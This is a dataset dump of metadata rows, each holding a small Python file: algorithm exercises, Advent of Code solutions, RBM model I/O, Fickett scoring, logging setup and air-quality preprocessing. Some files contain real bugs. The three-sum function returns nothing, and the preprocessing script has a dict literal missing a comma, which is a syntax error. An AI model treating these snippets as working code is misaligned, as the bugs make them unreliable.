blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
1fd63ac653e827651f90ec864e2499acff8b18dd | Python | Skrilltrax/DS | /grokking-python/two_pointer/three_sum.py | UTF-8 | 1,033 | 3.515625 | 4 | [] | no_license | from typing import List
def three_sum(self, nums: List[int]) -> List[List[int]]:
length: int = len(nums)
triplets: List[List[int]] = []
# sort the array
nums.sort()
for i in range(length):
if i > 0 and nums[i] == nums[i - 1]:
continue
else:
find_triplets_for_fixed(-nums[i], nums, i + 1, triplets)
def find_triplets_for_fixed(target, nums, left, triplets):
right: int = len(nums) - 1
while left < right:
current_sum: int = nums[left] + nums[right]
if current_sum == target:
triplets.append(-target)
triplets.append(nums[left])
triplets.append(nums[right])
left += 1
right -= 1
while left < right and nums[left] == nums[left - 1]:
left += 1
while left < right and nums[right] == nums[right + 1]:
right -= 1
elif current_sum < target:
left += 1
elif current_sum > target:
right -= 1
| true |
4449cb49e7785146f2b0f42d1f85ffa36e6760dc | Python | Hermes777/sparse_class_rbm | /ClassRBMPy/loading_model.py | UTF-8 | 1,674 | 2.6875 | 3 | [] | no_license | import os
import pdb
import rbm
import numpy
def matrix_load(path):
fobj = open(path, 'r')
line = fobj.readline()
line = line.strip()
row = int(line.split("\t")[0])
col = int(line.split("\t")[1])
matrix = []
for i in range(0, row):
line = fobj.readline()
line = line.strip()
tmp = line.split('\t')
if len(tmp) != col:
print "Invalid File, file col:%d define col:%d"%(len(tmp), col)
exit(-1)
for j in range(0, col):
tmp[j] = eval(tmp[j])
matrix.append(tmp)
return numpy.array(matrix)
def matrix_save(path, matrix):
wobj = open(path, 'w')
wobj.write(str(numpy.size(matrix,0))+"\t"+str(numpy.size(matrix,1))+"\n")
for i in range(0, numpy.size(matrix,0)):
for j in range(0, numpy.size(matrix,1)):
wobj.write(str(matrix[i][j])+"\t")
wobj.write('\n')
wobj.close()
def loading_model(path):
model = rbm.Model()
model.W = matrix_load(path+'/W.txt')
model.b = matrix_load(path+'/b.txt')
model.c = matrix_load(path+'/c.txt')
model.Wc = matrix_load(path+'/Wc.txt')
model.cc = matrix_load(path+'/cc.txt')
model.labels = matrix_load(path+'/labels.txt')
return model
def save_model(path, model):
if not os.path.exists(path):
os.mkdir(path)
matrix_save(path+'/W.txt', model.W)
matrix_save(path+'/b.txt', model.b)
matrix_save(path+'/c.txt', model.c)
matrix_save(path+'/Wc.txt', model.Wc)
matrix_save(path+'/cc.txt', model.cc)
matrix_save(path+'/labels.txt', model.labels)
if __name__ == '__main__':
model = loading_model('./model/test_model/')
| true |
e2932240f611b70d20b0c549717eba4d3109352b | Python | Twangist/prelogging | /examples/use_library.py | UTF-8 | 2,493 | 2.796875 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
__author__ = 'brianoneill'
import library
import logging
try:
import prelogging
except ImportError:
import sys
sys.path[0:0] = ['..'] # , '../..'
from prelogging import LCDict
def logging_config():
d = LCDict(attach_handlers_to_root=True) # LCDict default: =False
d.add_stdout_handler('stdout', formatter='logger_level_msg', level='DEBUG')
# NOTE: root level is WARNING (default),
# . 'library' logger level is INFO.
# . Messages of 'library' propagate,
# . and those of levels INFO and up *are logged*.
d.config()
def main():
# Exercise:
# Comment out and uncomment the following two lines, individually
# (4 cases); observe the console output in each case.
logging_config()
logging.getLogger().warning("I must caution you about that.")
library.do_package_thing()
library.do_something()
library.do_something_else()
# Results:
"""
(1)
logging_config()
logging.getLogger().warning("I must caution you about that.")
writes to stdout:
root : WARNING : I must caution you about that.
library : INFO : INFO msg from package logger
Did package thing.
library.module : INFO : INFO msg
Did something.
library.module.other: WARNING : WARNING msg
Did something else.
(2)
# logging_config()
logging.getLogger().warning("I must caution you about that.")
writes (to stdout)
Did package thing.
Did something.
Did something else.
and (to stderr)
I must caution you about that.
(possibly between or after the lines written to stdout).
(3)
logging_config()
# logging.getLogger().warning("I must caution you about that.")
writes to stdout:
library : INFO : INFO msg from package logger
Did package thing.
library.module : INFO : INFO msg
Did something.
library.module.other: WARNING : WARNING msg
Did something else.
(4)
# logging_config()
# logging.getLogger().warning("I must caution you about that.")
writes to stdout
Did package thing.
Did something.
Did something else.
"""
if __name__ == '__main__':
main()
| true |
db8c0ee56196a5d3de5f1aa70a30ab9c1afad660 | Python | qq851185223/IDDLncLoc | /lncloc/feature_extracting/CTD/feamodule/fickett.py | UTF-8 | 3,862 | 3.046875 | 3 | [] | no_license | #!/usr/bin/env python
'''the python script is downloaded from https://sourceforge.net/projects/rna-cpat/files/v1.2.2/'''
'''calculate coding potential'''
# Fickett TESTCODE data
# NAR 10(17) 5303-531
position_prob = {
'A': [0.94, 0.68, 0.84, 0.93, 0.58, 0.68, 0.45, 0.34, 0.20, 0.22],
'C': [0.80, 0.70, 0.70, 0.81, 0.66, 0.48, 0.51, 0.33, 0.30, 0.23],
'G': [0.90, 0.88, 0.74, 0.64, 0.53, 0.48, 0.27, 0.16, 0.08, 0.08],
'T': [0.97, 0.97, 0.91, 0.68, 0.69, 0.44, 0.54, 0.20, 0.09, 0.09]
}
position_weight = {'A': 0.26, 'C': 0.18, 'G': 0.31, 'T': 0.33}
position_para = [1.9, 1.8, 1.7, 1.6, 1.5, 1.4, 1.3, 1.2, 1.1, 0.0]
content_prob = {
'A': [0.28, 0.49, 0.44, 0.55, 0.62, 0.49, 0.67, 0.65, 0.81, 0.21],
'C': [0.82, 0.64, 0.51, 0.64, 0.59, 0.59, 0.43, 0.44, 0.39, 0.31],
'G': [0.40, 0.54, 0.47, 0.64, 0.64, 0.73, 0.41, 0.41, 0.33, 0.29],
'T': [0.28, 0.24, 0.39, 0.40, 0.55, 0.75, 0.56, 0.69, 0.51, 0.58]
}
content_weight = {'A': 0.11, 'C': 0.12, 'G': 0.15, 'T': 0.14}
content_para = [0.33, 0.31, 0.29, 0.27, 0.25, 0.23, 0.21, 0.17, 0]
def look_up_position_prob(value, base):
'''look up positional probability by base and value'''
if float(value) < 0:
return None
for idx, val in enumerate(position_para):
if (float(value) >= val):
return float(position_prob[base][idx]) * float(position_weight[base])
def look_up_content_prob(value, base):
'''look up content probability by base and value'''
if float(value) < 0:
return None
for idx, val in enumerate(content_para):
if (float(value) >= val):
return float(content_prob[base][idx]) * float(content_weight[base])
def fickett_value(dna):
'''calculate Fickett value. Input is DNA sequence'''
if len(dna) < 2:
return 0
fickett_score = 0
dna = dna.upper()
total_base = len(dna)
A_content = float(dna.count('A')) / total_base
C_content = float(dna.count('C')) / total_base
G_content = float(dna.count('G')) / total_base
T_content = float(dna.count('T')) / total_base
# print "A content\t" + str(A_content)
# print "C content\t" + str(C_content)
# print "G content\t" + str(G_content)
# print "T content\t" + str(T_content)
phase_0 = [dna[i] for i in range(0, len(dna)) if i % 3 == 0]
phase_1 = [dna[i] for i in range(0, len(dna)) if i % 3 == 1]
phase_2 = [dna[i] for i in range(0, len(dna)) if i % 3 == 2]
A_position = max(phase_0.count('A'), phase_1.count('A'), phase_2.count('A')) / (
min(phase_0.count('A'), phase_1.count('A'), phase_2.count('A')) + 1.0)
C_position = max(phase_0.count('C'), phase_1.count('C'), phase_2.count('C')) / (
min(phase_0.count('C'), phase_1.count('C'), phase_2.count('C')) + 1.0)
G_position = max(phase_0.count('G'), phase_1.count('G'), phase_2.count('G')) / (
min(phase_0.count('G'), phase_1.count('G'), phase_2.count('G')) + 1.0)
T_position = max(phase_0.count('T'), phase_1.count('T'), phase_2.count('T')) / (
min(phase_0.count('T'), phase_1.count('T'), phase_2.count('T')) + 1.0)
# print "A position\t" + str(A_position)
# print "C position\t" + str(C_position)
# print "G position\t" + str(G_position)
# print "T position\t" + str(T_position)
# for i (A_content,C_content,G_content,T_content):
fickett_score += look_up_content_prob(A_content, 'A')
fickett_score += look_up_content_prob(C_content, 'C')
fickett_score += look_up_content_prob(G_content, 'G')
fickett_score += look_up_content_prob(T_content, 'T')
fickett_score += look_up_position_prob(A_position, 'A')
fickett_score += look_up_position_prob(C_position, 'C')
fickett_score += look_up_position_prob(G_position, 'G')
fickett_score += look_up_position_prob(T_position, 'T')
return fickett_score
| true |
a8b60a0f27843a84dcd5a3d54c6033a4e38dc8fe | Python | tradermichael/Python_Based | /project-2c-tradermichael/change.py | UTF-8 | 388 | 3.625 | 4 | [] | no_license | cents = int(input("Please enter an amount in cents less than a dollar.\n"))
quarters=cents//25
leftover=cents
leftover=(cents%25)
dimes = leftover//10
leftover=(leftover%10)
nickels = leftover//5
leftover = (leftover%5)
pennies = leftover
print("Your change will be:")
print("Q: "+str(quarters))
print("D: "+str(dimes))
print("N: "+str(nickels))
print("P: "+str(pennies))
| true |
afea459e0ba5590c1bc49daa582c10fcdb6a9b18 | Python | erjan/coding_exercises | /bold_words_in_string.py | UTF-8 | 1,092 | 3.484375 | 3 | [
"Apache-2.0"
] | permissive | '''
Given an array of keywords words and a string s, make all appearances of all keywords words[i] in s bold. Any letters between <b> and </b> tags become bold.
Return s after adding the bold tags. The returned string should use the least number of tags possible, and the tags should form a valid combination.
'''
class Solution:
def boldWords(self, words: List[str], S: str) -> str:
bold = [0] * len(S)
for word in words:
start = 0
while start < len(S):
idx = S.find(word, start)
if idx >= 0 :
bold[idx:idx+len(word)] = [1] * len(word)
start = idx + 1
else:
break
result = []
for i, c in enumerate(S):
if bold[i] and (i == 0 or not bold[i - 1]):
result.append('<b>')
result.append(c)
if bold[i] and (i == len(S) - 1 or not bold[i + 1]):
result.append('</b>')
return "".join(result)
| true |
a15ac89f6e744bea7bea79c3e165325239d3e15b | Python | Molo-M/Polygon-Area-Calculator | /Polygon Area Calculator.py | UTF-8 | 2,113 | 3.703125 | 4 | [] | no_license | class Rectangle:
def __init__(self, width, height):
self.width = width
self.height = height
self.area = 0
def set_width(self, width):
self.width = width
def set_height(self, height):
self.height = height
def get_area(self):
self.area = self.width * self.height
return self.area
def get_perimeter(self):
perimeter = (2 * self.height) + (2 * self.width)
return perimeter
def get_diagonal(self):
diagonal = ((self.width ** 2 + self.height ** 2) ** .5)
return diagonal
def get_picture(self):
if self.width > 50 or self.height > 50:
return 'Too big for picture.'
else:
img = ''
width = '*' * self.width
img += width
for i in range(self.height - 1):
img += '\n' + width
img += '\n'
return img
def get_amount_inside(self, shape):
self.get_area()
shape.get_area()
if self.area < shape.area or self.width < shape.width or self.height < shape.height:
return 0
else:
fit = int(self.area/shape.area)
return fit
def __str__(self):
height = str(self.height)
width = str(self.width)
show = f'Rectangle(width={width}, height={height})'
return show
class Square(Rectangle):
def __init__(self, side):
super().__init__(width=side, height=side)
self.side = side
def set_side(self, side):
super().set_width(width=side)
super().set_height(height=side)
self.side = side
def set_width(self, width):
super().set_width(width=width)
self.side = width
def set_height(self, height):
super().set_height(width=height)
# self.side = height
def __str__(self):
res = f'Square(side={str(self.side)})'
return res
rect = Rectangle(10, 5)
sq = Square(9)
rect.set_width(7)
rect.set_height(8)
sq.set_side(2)
print(sq.get_picture())
print('------')
f = "**\n**\n"
print(f)
print('-------')
| true |
41a66a3f39416f186426126c00ba816d8ab6202b | Python | adeak/AoC2018 | /day09.py | UTF-8 | 1,073 | 3.484375 | 3 | [] | no_license | from itertools import cycle
from collections import deque
class Marbles(deque):
def moveclock(self, n=1):
self.rotate(-n)
def movecounter(self, n=1):
self.rotate(n)
def insertright(self, val):
self.moveclock()
self.appendleft(val)
def remove(self):
self.popleft()
def day09(inp, factor=1):
vals = inp.split()
nplay = int(vals[0])
nmarb = int(vals[-2])*factor + 1
marbles = Marbles([0])
scores = [0]*nplay
elfit = iter(cycle(range(nplay)))
for val in range(1, nmarb):
elf = next(elfit)
if not val % 23:
marbles.movecounter(7)
scores[elf] += val + marbles[0]
marbles.remove()
else:
marbles.moveclock()
marbles.insertright(val)
return max(scores)
if __name__ == "__main__":
testinp = open('day09.testinp').read().strip()
inp = open('day09.inp').read().strip()
print(day09(testinp))
print(day09(inp))
print(day09(testinp, factor=100))
print(day09(inp, factor=100))
| true |
3092a3d2c738c60acb8193d4ab4ccf8b82278a63 | Python | Rudya93/Python1 | /10.py | UTF-8 | 690 | 3.203125 | 3 | [] | no_license | # a = list()
# c =[]
a = input("Please input string: ")
# for i in (len(a)):
# b = input()
# b = (int(b))
# c.append(b)
b = a.count('a')
c = a.count('b')
d = a.count('c')
e = a.count('d')
f = a.count('e')
g = a.count('f')
l = a.count('g')
h = a.count('h')
m = a.count('l')
n = a.count('m')
o = a.count('n')
p = a.count('o')
q = a.count('p')
r = a.count('q')
s = a.count('r')
t = a.count('s')
w = a.count('t')
print('a' * b + 'b' * c + 'c' * d + 'd' * e + 'e' * f + 'f' * g + 'g' * l + 'l' * h)
#print (b)
# print('Abracadabra'.count('a'))
# # вернёт 4
# print(('a' * 10).count('aa'))
# # вернёт
#сколько вернет пмоножить и вывести | true |
f47bf4a9c0302bb8638ced921e6006a4241d2226 | Python | ttppggnnss/CodingNote | /2004/0410/boj 2661-2.py | UTF-8 | 482 | 2.796875 | 3 | [] | no_license | import sys
sys.stdin=open('../input.txt','r')
L=['1','2','3']
def f(n,c='',k=0):
global p
if p:
return
if k==n:
p=c
print(p)
return
else:
for i in L:
d=c+i
if g(d):
f(n,d,k+1)
else:
continue
def g(d):
k=len(d)
m=(k+1)//2
for i in range(2,m+2):
if d[-1:-i:-1]==d[-i:-i-i+1:-1]:
return False
return True
p=0
f(int(input())) | true |
bfa629bcaf747f22f6d301080912d8ffae1ecc22 | Python | bsammor/machine-learning | /preprocess.py | UTF-8 | 7,256 | 3.234375 | 3 | [] | no_license | #-------------------------------------------------------------------------------
# This code is to preprocess the dataset from the below link:
# https://archive.ics.uci.edu/ml/datasets/Beijing+Multi-Site+Air-Quality+Data
#
# Before running this code, keep the downloaded dataset in a zip file
# in the same directory as this code. Name the zip file Data.zip
#
# Input: (look for this in global variables) 'path' variable
# Output: [X, Y] values which are preprocessed for training
#
# Date: 07 Mar 2020
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# IMPORTS
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
import glob
import os
#-------------------------------------------------------------------------------
# GLOBAL VARIABLES
#path to the unziped dataset directory
path = '/home/saarika/Desktop/ML/PRSA_Data_20130301-20170228/'
try:
print("\treading from path: ", path, "\t")
all_files = glob.glob(os.path.join(path, "*.csv"))
except: print("\nNo path specified. Please specify path in preprocess.py\n")
#-------------------------------------------------------------------------------
# FUNCTIONS
# Function to intialize an empty dictionary to a dictionary with the
# skeleton of the dataframe
# takes in a dataframe
# returns a dictionary with the skeleton of the dataframe
def initialize_dict(df):
d = {}
for i in range(len(df.columns)):
d[df.columns[i]] = []
return d
# Function to create 1 row for the particular date
# input: dictionary(with the skeleton of the df/can have some values ), the dataframe, the date
# returns a dictionary appended with that date's mean data
def MeanofThatDay(init_dict, df3000, date):
for x in range(len(df3000.columns)):
if np.dtype(df3000[df3000.columns[x]]) != np.dtype('O'): #Checking if the column is a String(type : 'O' - meaning 'Object' ) columns
init_dict[df3000.columns[x]].append(df3000.loc[df3000.Date == date][df3000.columns[x]].mean())
else:
init_dict[df3000.columns[x]].append(df3000.loc[df3000.Date == date][df3000.columns[x]].tolist()[0])
return init_dict
#Function to Group Wind Direction into 4 groups: NW, NE, SW, SE
#Input: DataFrame with Wind Direction
#Output: DataFrame with grouped wind dir
def GroupWindDir(df):
df.replace({
'wd': {
'N': 'NW', 'WNW': 'NW', 'NNW': 'NW', 'W': 'NW' #For group NW
'NNE': 'NE', 'ENE' : 'NE', #For group NE
'E': 'SE', 'ESE': 'SE', 'SSE': 'SE', 'S': 'SE', #For group SE
'SSW': 'SW', 'WSW': 'SW' #For group SW
}
}, inplace=True)
# Function to Group Wind Direction into 4 numerical groups: 1, 2, 3, 4
# Input: DataFrame with Wind Direction
# Output: DataFrame with numerically grouped wind dir
def GroupWindDir_Numbers(df):
df.replace({
'wd': {
'NW': 1, # For group NW
'NE' : 2, # For group NE
'SE': 3, # For group SE
'SW': 4 # For group SW
}
}, inplace=True)
# Function to Group Stations into 12 numerical groups: 1, 2,.., 12
# Input: DataFrame with station
# Output: DataFrame with numerically named station
def GroupStation_Numbers(df):
df.replace({
'station': {
'Huairou': 1, 'Aotizhongxin': 2, 'Wanliu': 3, 'Tiantan': 4, 'Changping': 5,
'Gucheng': 6, 'Dongsi': 7, 'Wanshouxigong': 8, 'Guanyuan': 9, 'Nongzhanguan': 10,
'Dingling': 11, 'Shunyi': 12
}
}, inplace=True)
# Function to perform mean normalization and feature scaling
# takes in a dataframe.Series
# returns a df.Series scaled and mean normalized
def scale(column):
difference = column - column.mean()
return difference / column.std()
#-------------------------------------------------------------------------------
# MAIN
def main():
print("\nSTARTING PREPROCESSING\n")
#Run this for all stations
df_from_each_file = (pd.read_csv(f) for f in all_files)
df = pd.concat(df_from_each_file, ignore_index=True)
# For station values one by one
# Change index of 0 for all_files below
# f = all_files[0]
# df = pd.read_csv(f)
print("\tdropping NaN values of dataframe..\n")
df.dropna(inplace=True)
print("\tresetting index of dataframe..\n")
df.reset_index(inplace=True)
print("\tcreating 'Date' in dataframe..\n")
df['Date'] = df.year.astype(str) + '/' + df.month.astype(str) + '/' + df.day.astype(str)
# df.drop(columns = ['year', 'month', 'day', 'hour', 'No'], inplace=True)
# df.drop(columns = ['SO2', 'NO2', 'CO', 'O3', 'PM10'], inplace=True)
df.drop('year', axis = 1, inplace = True)
df.drop('month', axis = 1, inplace = True)
df.drop('day', axis = 1, inplace = True)
df.drop('hour', axis = 1, inplace = True)
df.drop('No', axis = 1, inplace = True)
df.drop('SO2', axis = 1, inplace = True)
df.drop('NO2', axis = 1, inplace = True)
df.drop('CO', axis = 1, inplace = True)
df.drop('O3', axis = 1, inplace = True)
df.drop('PM10', axis = 1, inplace = True)
print("\ttaking daily averages..\t (This will take some time to run for each station)")
# Final dataframe that with desired data
df_final = pd.DataFrame(initialize_dict(df)) #just creating an empty one
for station in df.station.unique(): # 'station' variable now holds the 12 values one by one
dfstation = df.loc[df.station == station] # dfstation is the new dataframe of that particular station
# Mean of the day
init_dict = initialize_dict(dfstation)
for date in dfstation.Date.unique():
init_dict = MeanofThatDay(init_dict, dfstation, date)
df_final = df_final.append(pd.DataFrame(init_dict), ignore_index=True)
print('done with ', station)
print("\n\tgiving nos to wind direction..\n")
# Grouping of wind directions
GroupWindDir(df_final)
GroupWindDir_Numbers(df_final)
print("\tgiving nos to stations..\n")
# Grouping of stations
GroupStation_Numbers(df_final)
print("\tSending unscaled data into a csv file for future reference..\n")
# Writing into a csv file for reference
df_final.to_csv('preproc.csv', index=False)
print("\tScaling data..\n")
# Y values from our final set
Y = np.array(df_final['PM2.5'])
# Extract the wind direction and stations
X_wd = np.array([df_final.wd])
X_station = np.array([df_final.station])
#dropping Y and X_wd from the DataFrame to be scaled
#df_final.drop(columns=['PM2.5', 'wd', 'Date', 'station'], inplace=True)
df.drop('PM2.5', axis = 1, inplace = True)
df.drop('wd', axis = 1, inplace = True)
df.drop('Date', axis = 1, inplace = True)
df.drop('station', axis = 1, inplace = True)
# Scale dataframe
for col in df_final.columns:
df_final[col] = scale(df_final[col])
X_temp = np.array(df_final)
# Regroup the X_wd and X_station with X_temp to get the final X set of features
X = np.append(X_temp, np.transpose(X_wd), axis=1)
X = np.append(X, np.transpose(X_station), axis=1)
print("\nPREPROCESSING FINISHED SUCCESSFULLY\n")
return [X, Y]
if __name__ == '__main__':
main()
| true |
f6d59a9d7bdef00ee744d5792e07163bbbd9b234 | Python | butteredcorn/agile-assignment-1 | /database.py | UTF-8 | 6,186 | 3.015625 | 3 | [] | no_license | import pickle
import importlib
import itertools
from operator import itemgetter
reminders = importlib.import_module('reminders')
constant = {
'empty_string': 0,
'first_id': 0,
'offset': 1,
'none': 0,
'increment': 1
}
# print(constant['empty_string'])
# print(constant['first_id'])
# print(constant['offset'])
"""
Class for storing, searching, and importing/exporting reminders
Depends on: reminders.py
"""
class Store:
#reminder objects stored in a list
def __init__(self):
self.__reminders = []
#returns an array of strings describing reminder objects in the Store
#reminder.__dict__ in the format of {'_id': constant['first_id'], '_Reminder__text': 'hello world', '_Reminder__tags': 'some tag'}
@property
def reminders(self):
dict_cache = []
for reminder in self.__reminders:
dict_cache.append(f"Reminder ID: {reminder.id} | Tags: {reminder.tags}\nDescription: {reminder.text}\n")
return dict_cache
#add reminder object to the Store list
def addReminder(self, reminder):
self.__reminders.append(reminder)
#search through Store list and return matching Reminder objects, if found
def search(self, tag = None, text = None, both = None):
if tag is None and text is None and both is None:
raise ValueError("Non-Permissible Search Parameters: Not all three fields can be None.")
elif tag == "" or text == "" or both == "":
raise ValueError("Non-Permissible Search Parameters: Search parameter cannot be empty string.")
elif tag.lower() == "none":
print("\nPlease be advised that reminders without tags cannot be searched by typing 'none'.")
elif (tag):
searchCache = []
for reminder in self.__reminders:
if reminder.tags is None:
continue
else:
for eachTag in reminder.tags:
if eachTag == tag:
searchCache.append(reminder)
return searchCache #return the whole reminder, engine can parse
elif (text):
searchCache = []
for reminder in self.__reminders:
if text in reminder.text:
searchCache.append(reminder)
return searchCache #return __dict__ just for display purposes
elif (both):
#note that both is the search term, the option to choose both is handled in the ReminderEngine
searchCache = []
for reminder in self.__reminders:
if both in reminder.text:
searchCache.append(reminder)
elif reminder.tags is None:
continue
else:
for eachTag in reminder.tags:
if eachTag == tag:
searchCache.append(reminder)
return searchCache
#search through Store list by ID and modify that reminder
def searchByID(self, reminderID):
if reminderID and isinstance(int(reminderID), int):
for reminder in self.__reminders:
if reminder.id == int(reminderID):
return reminder
else:
return print("Error: Please enter an integer only.")
#export Store list to root directory as pickle file
def exportToPickle(self, fileName):
if fileName == "":
raise ValueError("Filename cannot be of type empty string.")
if self.__reminders == []:
return print("\nNothing to export.")
else:
cacheOut = []
pickle_out = open(f"{fileName}.pickle", "wb") #wb = writable
for reminder in self.__reminders:
# print(reminder)
cacheOut.append(reminder)
pickle.dump(cacheOut, pickle_out)
pickle_out.close()
print(f"\nReminders have been exported to {fileName}.pickle.")
#import pickle file from root directory
# - will take care of merge conflicts
# - will reset Reminders.resource_cl ID generator
# - will sort reminders after merge by ID
def importFromPickle(self, fileName):
pickle_in = open((f"{fileName}.pickle"), "rb") #rb = readable
importedReminders = pickle.load(pickle_in)
# for reminder in importedReminders:
# print(reminder)
# print(importedReminders)
if self.__reminders == []:
currentHighestLocalID = constant['first_id']
else:
currentHighestLocalID = int((self.__reminders[-1]).id)
nextID = currentHighestLocalID + constant['offset']
setCache = []
if len(self.__reminders) != constant['empty_string']:
for localReminder in self.__reminders:
setCache.append(localReminder)
if len(setCache) != constant['empty_string']:
for importedReminder in importedReminders:
for localReminder in setCache:
if importedReminder.id == localReminder.id:
if importedReminder.text == localReminder.text and importedReminder.tags == localReminder.tags:
#exact duplicate identified
continue
else:
#conflicting ids, but different reminders
localReminder.id = nextID
setCache.append(importedReminder)
nextID = nextID + constant['offset']
else:
for importedReminder in importedReminders:
#print(importedReminder)
setCache.append(importedReminder)
nextID = nextID + constant['offset']
nextID = nextID - constant['offset']
#sort order of reminders after merge
setCache.sort(key=lambda x: x._id)
#print(setCache)
self.__reminders = setCache
#sync up the auto-incrementingID generator in reminders
reminders.resource_cl.setGenerator(nextID)
| true |
d56cdf365e00f1c2cd94d996fd155f22f6a94476 | Python | itomi/algorithms | /graphs/connected_components/connected.py | UTF-8 | 1,334 | 3.140625 | 3 | [] | no_license | import sys
class Graph:
def __init__(self):
self.nodes = set()
self.edges = set()
self.properties = []
def __repr__(self):
str = "nodes: "+repr(self.nodes)+"\n"
str += "edges: "+repr(self.edges)+"\n"
str += repr(self.properties)
return str
def connected_components_set(graph):
collections = set()
marked = set()
def connected_component(graph,node):
collection = set([node])
for a,b in graph.edges:
if a in collection:
collection.add(b)
return collection
for node in graph.nodes:
if node in marked:
continue
next = connected_component(graph,node)
collections.add(tuple(next))
marked.union(collections)
return collections
def parse_file_set(filename):
file = open(filename)
graph = Graph()
for line in file:
line = line.strip()
if line in ["undirected"]:
graph.properties.append("undirected")
continue
a,b = line.split()
graph.nodes= graph.nodes.union([a,b])
graph.edges.add((a,b))
if "undirected" in graph.properties:
closure = set()
for a,b in graph.edges:
closure.add((b,a))
graph.edges = graph.edges.union(closure)
print graph
return graph
def main(args):
if len(args) < 1:
print "file name expected"
exit()
filename = args[0]
graph = parse_file_set(filename)
print connected_components_set(graph)
if __name__=='__main__':
main(sys.argv[1:])
| true |
4d21a80ca730c9db13c15559fb94d2101d9ca1ea | Python | ovbystrova/Infosearch | /Final project/preprocess.py | UTF-8 | 731 | 2.90625 | 3 | [] | no_license | import re
import pymorphy2 as pm
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
stopWords = set(stopwords.words('russian'))
morph = pm.MorphAnalyzer()
def preprocess(text):
"""Функция на вход получает текст и возвращает список нормализованных слов, без знаков пунктуации, без стопслов"""
text = text.lower()
tokenizer = RegexpTokenizer(r'\w+')
tokens = tokenizer.tokenize(text)
filtered_words = list(filter(lambda token: token not in stopwords.words('russian'), tokens))
norm_words = [morph.parse(token)[0].normal_form for token in filtered_words]
return norm_words | true |
9814b0233d0960f9f4796e0ba2681a26ebc4460b | Python | ds-ga-1007/assignment7 | /hz1411/functions.py | UTF-8 | 2,719 | 3.6875 | 4 | [] | no_license | from exceptions import *
from interval import *
def isOverlapping(int1, int2):
''' check if 2 intervals are overlapping/adjacent so they can be merged '''
if int1.upper+1 == int2.lower and int1.bound_upper==']' and int2.bound_lower=='[':
return True
elif int2.upper+1 == int2.lower and int2.bound_upper==']' and int1.bound_lower=='[':
return True
elif int1.upper < int2.lower or int1.lower > int2.upper:
return False
elif int1.lower == int2.upper and int1.bound_lower == '(' and int2.bound_upper== ')':
return False
elif int2.lower == int1.upper and int2.bound_lower == '(' and int1.bound_upper == ')':
return False
else:
return True
def mergeIntervals(int1, int2):
'''Take 2 intervals from input and merge them. If they are not overlapping/adjacent,
raise error. Then the function find the lower side and the upper side of the merged
list separately, and return the merged list.
'''
if not isOverlapping(int1,int2):
raise MergeError
intm = '' # merged list
# find lower side of merged list
if int1.lower == int2.lower:
if int1.bound_lower == '[' or int2.bound_lower == '[':
intm += '['+ str(int1.lower) + ','
else:
intm += '('+ str(int1.lower) + ','
if int1.lower < int2.lower:
intm += int1.bound_lower + str(int1.lower) + ','
if int1.lower > int2.lower:
intm += int2.bound_lower + str(int2.lower) + ','
# find upper side of merged list
if int1.upper == int2.upper:
if int1.bound_upper == ']' or int2.bound_upper == ']':
intm += str(int1.upper) + ']'
else:
intm += str(int1.upper) + ')'
if int1.upper < int2.upper:
intm += str(int2.upper) + int2.bound_upper
if int1.upper > int2.upper:
intm += str(int1.upper) + int1.bound_upper
return interval(intm)
def mergeOverlapping(intervals):
'''The input intervals are first sort by their lower side.
For each loop, intervals[i] is merged with the next interval until it cannot be merged,
and return the merged intervals.
'''
intervals.sort(key=lambda x: x.lower)
i = 0
while i < len(intervals)-1:
j = i+1
if isOverlapping(intervals[i],intervals[j]):
intervals[i] = mergeIntervals(intervals[i],intervals[j])
intervals.pop(j)
else:
i += 1
return intervals
def insert(intervals, newint):
'''Append a new interval into list of intervals,
then return the updated intervals that are sorted and merged'''
intervals.append(newint)
mergeOverlapping(intervals)
return intervals
| true |
fc031552672fe0d163a5272b5df1744f29b8cd89 | Python | masinogns/boj | /algorithm/2.Data_Structure_1/BOJ_basic_19.py | UTF-8 | 2,155 | 4.125 | 4 | [] | no_license | """
BOJ_basic_19 : 에디터 : BOJ 1406
https://www.acmicpc.net/board/view/11623
참고 자료.
스택을 2개로 구현하여 커서를 기준으로 왼쪽은 왼쪽 스택, 오른쪽은 오른쪽 스택으로 칭하여 푼다.
커서의 이동 시, 삭제 시 그리고 추가 시 행위는 각 스택의 pop과 push로 이루어진다.
이 때, 각 pop된 요소들은 push 요소로 들어갈 수도 있음을 명심하자.
print("".join(stackL.stack) + "".join(stackR.stack))
http://mwultong.blogspot.com/2006/12/python-join-list-array.html
참고
"""
class Stack:
def __init__(self):
self.stack = list()
def push(self, params):
self.stack.append(params)
def pop(self):
if len(self.stack) > 0 :
del self.stack[len(self.stack) - 1]
else:
print("Do not continue pop")
def front(self):
result = 0
if len(self.stack) != 0:
result = self.stack[len(self.stack) - 1]
else:
result = -10
return result
if __name__ == '__main__':
stackL = Stack()
stackR = Stack()
inString = list(input())
N = int(input())
stackL.stack = inString[:]
for number in range(N):
inCommand = input().split()
command = inCommand[0]
if len(inCommand) == 2:
params = inCommand[1]
if command == "L":
if len(stackL.stack) != 0:
front = stackL.front()
stackL.pop()
stackR.push(front)
else:
continue
elif command == "D":
if len(stackR.stack) != 0:
front = stackL.front()
stackR.pop()
stackL.push(front)
else:
continue
elif command == "B":
if len(stackL.stack) != 0:
stackL.pop()
else:
continue
elif command == "P":
stackL.push(params)
#print(stackL.stack + stackR.stack)
print("".join(stackL.stack) + "".join(stackR.stack))
| true |
a3c1ea99c8fd6dc1d89b165a8e84df1a07536004 | Python | andva/advent | /2020/3/a.py | UTF-8 | 401 | 2.734375 | 3 | [] | no_license | import math
import numpy as np
def main():
f = open("input.txt")
i = 0
nHit = 0
for line in f:
nCols = len(line)
modL = list(line)
if line[i] == '#':
nHit += 1
modL[i] = "X"
else:
modL[i] = "0"
print("".join(modL))
i = (i + 3) % (nCols - 1)
print(str(nHit))
if __name__ == "__main__":
main()
| true |
